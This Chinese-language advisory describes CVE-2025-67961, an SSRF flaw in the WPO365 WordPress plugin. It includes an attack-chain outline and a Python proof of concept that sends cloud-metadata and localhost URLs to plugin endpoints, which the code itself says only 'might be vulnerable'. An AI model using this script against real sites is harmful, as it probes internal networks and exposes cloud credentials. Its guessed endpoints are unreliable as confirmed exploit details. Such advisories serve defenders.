CVE-2025-67961 CVSS 6.4 中危

CVE-2025-67961 WordPress WPO365插件SSRF漏洞

披露日期: 2026-01-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-67961

漏洞类型

服务端请求伪造(SSRF)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WPO365 wpo365-login

漏洞概述

CVE-2025-67961是WordPress插件WPO365 wpo365-login中的一个服务器端请求伪造(SSRF)漏洞。该插件版本小于等于40.0受影响。攻击者可利用此漏洞让服务器发起任意HTTP请求，可能访问内部系统、读取本地资源或对内部服务进行端口扫描。CVSS评分6.4，属于中等严重程度。漏洞由PatchStack团队发现并报告。由于WPO365是用于将WordPress与Microsoft 365/Azure AD集成的认证插件，SSRF漏洞可能被利用来探测内网环境或访问云元数据服务获取敏感信息。

技术细节

SSRF(Server-Side Request Forgery)漏洞允许攻击者通过构造恶意请求，诱使服务器向攻击者指定的目标发起请求。在WPO365插件中，由于对用户输入的URL参数缺少严格验证，攻击者可以指定内部IP(如127.0.0.1、10.x.x.x)或云服务元数据端点(如169.254.169.254)作为请求目标。攻击者通过WordPress前端向插件的回调接口或配置端点发送包含内部资源的URL，服务器会代替攻击者发起请求并将响应返回。攻击者可利用此探测内网拓扑、读取云环境凭证或访问管理接口。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress站点安装了WPO365插件(版本<=40.0)

STEP 2

步骤2

攻击者访问WPO365的SSO回调或认证端点

STEP 3

步骤3

攻击者构造包含内部IP或元数据服务URL的请求参数

STEP 4

步骤4

服务器解析请求并向攻击者指定的目标发起HTTP请求

STEP 5

步骤5

服务器将内部资源响应返回给攻击者，实现信息探测或数据读取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-67961 SSRF PoC for WPO365 <= 40.0
# Target: WordPress site with vulnerable WPO365 plugin

target_url = "http://target-wordpress-site.com"

# SSRF payload to fetch internal metadata (AWS/Azure/GCP)
ssrf_payloads = [
    "http://169.254.169.254/latest/meta-data/",
    "http://169.254.169.254/latest/user-data/",
    "http://127.0.0.1/admin/",
    "http://localhost:8080/",
]

# Common WPO365 endpoints that might be vulnerable
endpoints = [
    "/wp-json/wpo365/v1/sso/callback",
    "/?rest_route=/wpo365/v1/auth",
    "/wp-admin/admin-ajax.php?action=wpo365_sso"
]

for endpoint in endpoints:
    for payload in ssrf_payloads:
        params = {
            "redirect_url": payload,
            "state": "test"
        }
        try:
            response = requests.get(
                target_url + endpoint,
                params=params,
                timeout=10,
                allow_redirects=False
            )
            print(f"Endpoint: {endpoint}")
            print(f"Payload: {payload}")
            print(f"Status: {response.status_code}")
            print(f"Response: {response.text[:200]}")
            print("---")
        except requests.RequestException as e:
            print(f"Error: {e}")

影响范围

WPO365 wpo365-login <= 40.0

防御指南

临时缓解措施

立即将WPO365插件升级到40.0以上版本。在等待更新期间，可暂时禁用WPO365插件或限制其网络访问权限。建议使用Web应用防火墙规则阻止对内部IP段和元数据端点的请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表